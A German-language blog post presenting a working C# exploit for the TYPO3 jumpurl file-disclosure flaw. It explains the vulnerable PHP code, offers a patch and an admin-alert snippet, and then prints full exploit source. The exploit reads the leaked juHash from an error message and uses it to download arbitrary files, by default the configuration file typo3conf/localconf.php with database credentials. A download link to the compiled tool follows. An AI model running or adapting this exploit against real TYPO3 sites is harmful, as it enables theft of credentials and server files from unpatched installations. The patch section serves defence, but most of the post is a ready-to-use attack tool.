C#: Typo3 Jumpurl Exploit

Um es mir zu ermöglichen Typo3 Installationen von Windows System aus auf die Jumpurl Sicherheitslückezu überprüfen, habe ich mir einen Exploit in C# programmiert. Ich veröffentliche den Exploit erst jetzt, weil inzwischen die meisten Systeme gefixt sein sollten. Zunächst möchte ich die Vorgehensweise des Exploits beschreiben.

Als erstes wird ein HTTP Anfrage mit einer bestimmten Kombination an GET Parametern an Typo3 gesandt. Die Antwort dieser Anfrage wird eingelesen und die Prüfsumme die in der Antwort steht ausgelesen. Nun wird eine zweite Anfrage an das Typo3 System gesandt. Diese Abfrage ist eine Downloadanforderung für eine Datei, welche mit der Prüfsumme aus der zuvor erhaltenen Anfrage validiert wird.

Verwundbar sind die Typo3 Versionen TYPO3 < 4.2.6, TYPO3 < 4.1.10 und TYPO3 < 4.0.12. In den Typo3 Versionen < 4 findest du die fehlerhafte Datei in „tslib/class.tslib_fe.php“. In den Versionen >= 4 ist die Datei unter „typo3/sysext/cms/tslib/class.tslib_fe.php“ zu finden. Schauen wir uns den verwundbaren Quellcodeabschnitt mit Vorgangs relevanten Kommentaren Typo3 aus an:

## Prüfen ob $_GET['jumpurl'] nicht leer ist
if ($this-&gt;jumpurl)	{
 
    ## Prüfen ob $_GET['juSecure'] nicht leer ist
    if (t3lib_div::_GP('juSecure'))	{
        $hArr = array(
            $this-&gt;jumpurl,
            t3lib_div::_GP('locationData'),
            $this-&gt;TYPO3_CONF_VARS['SYS']['encryptionKey']
        );
        $calcJuHash=t3lib_div::shortMD5(serialize($hArr));
        $locationData = t3lib_div::_GP('locationData');
        $juHash = t3lib_div::_GP('juHash');
 
        ## Prüfe ob $_GET['juHash'] gleich der errechneten Prüfsumme
        if ($juHash == $calcJuHash)	{
 
            ## $_GET['locationData'] überprüfen
            if ($this-&gt;locDataCheck($locationData))	{
                $this-&gt;jumpurl = rawurldecode($this-&gt;jumpurl);
                if (t3lib_div::verifyFilenameAgainstDenyPattern($this-&gt;jumpurl) &amp;&amp; basename(dirname($this-&gt;jumpurl)) !== 'typo3conf') {
                    if (@is_file($this-&gt;jumpurl)) {
                        $mimeType = t3lib_div::_GP('mimeType');
                        $mimeType = $mimeType ? $mimeType : 'application/octet-stream';
 
                        ## Das Senden der Datei
                        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                        header('Content-Type: '.$mimeType);
                        header('Content-Disposition: attachment; filename='.basename($this-&gt;jumpurl));
                        readfile($this-&gt;jumpurl);
                        exit;
                    } else die('jumpurl Secure: "'.$this-&gt;jumpurl.'" was not a valid file!');
                } else die('jumpurl Secure: The requested file type was not allowed to be accessed through jumpUrl (fileDenyPattern)!');
            } else die('jumpurl Secure: locationData, '.$locationData.', was not accessible.');
 
        ## Hier findet die Ausgabe der Prüfsumme statt
        } else die('jumpurl Secure: Calculated juHash, '.$calcJuHash.', did not match the submitted juHash.');
    } else {

Die Sicherheitslücke kann durch das ersetzen von:

} else die('jumpurl Secure: Calculated juHash, '.$calcJuHash.', did not match the submitted juHash.');

durch:

} else die('jumpurl Secure: Calculated juHash did not match the submitted juHash.');

geschlossen werden. Natürlich kannst du potentiellen Angreifern auch eine Nachricht hinterlassen oder dich über einen Angriff und den Angreifer informieren lassen. Ein kleines Beispiel hierzu:

} else {
	mail(
		'mail@example.com', ## Hier musst du deine E-Mail Adresse eintragen
		'Möglicher Einbruchsversuch auf Ihrem Typo3 System ('.$_SERVER['HTTP_HOST'].') via Jumpurl',		
		"IP:n".$_SERVER['REMOTE_ADDR'].
		"nnUhrzeit:n".date('d.m.Y H:i:s', $_SERVER['REQUEST_TIME']).
		"nnGET Parameter:n".$_SERVER['QUERY_STRING'],
		"Content-type: text/plain; charset=utf-8rn"
	);
        exit('

Der Systemadministrator wurde benachrichtigt.

‚); }

(Der zu ersetzende Teil bezieht sich auf den oben angesprochenen Fehlerhaften Quellcodeabschnitt)

Der C# Quellcode basiert auf der get_http_as_string Funktion die bereits in einem anderen Artikel besprochen wurde. Das ist der, wie immer gut kommentierte, C# Exploit Quellcode für die Typo3 Sicheitslücke:

/*
 * [arg[0] = string] die URL zum Typo3 System
 * [arg[1] = string] (optional) die herunterzuladende Datei
 */
public static void Main(string[] args)
{
        // Prüfe ob arg[0] vorhanden
	if (args.Length &gt; 0) 
        {
                // Regulärer Ausdruck für die URL Validierung         
		Regex r = new Regex(@"^https?://([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?.)+([a-zA-Z]{2,6})/|[a-zA-Z0-9]/$");
 
                // Prüfe ob URL valide anhand des Regulären Ausdrucks		
		if (r.IsMatch(args[0]))
		{
			string file = "";
 
                        // Prüfe ob arg[1] vorhanden
			if (args.Length &gt; 1) 
			{
 
                               // Prüfe ob arg[1] nicht leer ist  
				if (args[1].Length &gt; 0) 
				{
					file = args[1];
				}
				else 
				{
					file = "typo3conf/localconf.php";
				}
			}
			else 
			{
				file = "typo3conf/localconf.php";
			}
 
                        // Ermittle mit einer HTTP Anfrage die Ausgabe der Prüfsumme
			string content = http_get_as_string(args[0] + "index.php?jumpurl=" + file + "&amp;juSecure=1&amp;locationData=1:", 8192);
 
                        // Prüfe ob Ausgabe vorhanden
			if (content.Length &gt; 0) {
 
                                // Regulärer Ausdruck für die Prüfsumme
				r = new Regex("([a-f0-9]{10})+");
 
                                // Versuche die Prüfsumme anhand des Regulären Ausdrucks zu finden
				Match m = r.Match(content);
 
                                // Prüfe ob die Prüfsumme gefunden wurde
				if (m.Length &gt; 0)
				{
                                        // Prüfsumme wurde gefunden. Starte zweite HTTP Anfrage mit der Downloadanforderung.
					content = http_get_as_string(args[0] + "index.php?jumpurl=" + file + "&amp;juSecure=1&amp;locationData=1:&amp;juHash=" + m.Value, 8192);
					Console.WriteLine("# File content:");
					Console.WriteLine(content);
					Console.WriteLine("# Attack successful!");
				}
				else
				{
					Console.WriteLine("# Hash indeterminate );");
				}	
			}
			else
			{
				Console.WriteLine("# Something is going really wrong. Maybe the URL?");
			}
		}
		else
		{
			Console.WriteLine("# Wrong URL format. Try this: http://./&lt;dir[OPTIONAL]&gt;/");	
		}
	}
	else 
	{
		Console.WriteLine("# Typo3 Jumpurl exploit");	
		Console.WriteLine("# Usage: http://./ &lt;file[OPTIONAL]&gt;");
		Console.WriteLine("# More: http://www.monkey-business.biz/495/c-typo3-jumpurl-exploit/");
	}	
}

Ist das zweite Argument beim Programmaufruf nicht gesetzt wird versucht die Typo3 Konfigurationsdatei aus dem standard Pfad (typo3conf/localconf.php) herunterzuladen.

Das komplette Mono Projekt inklusive der ausführbaren Datei kann hier heruntergeladen werden:

Typo3 Jumpurl Exploit – C# Mono Projekt – herunterladen

(Das Programm ist zu Studienzwecken da und nicht um damit Unfug zu treiben)

Keine Kommentare »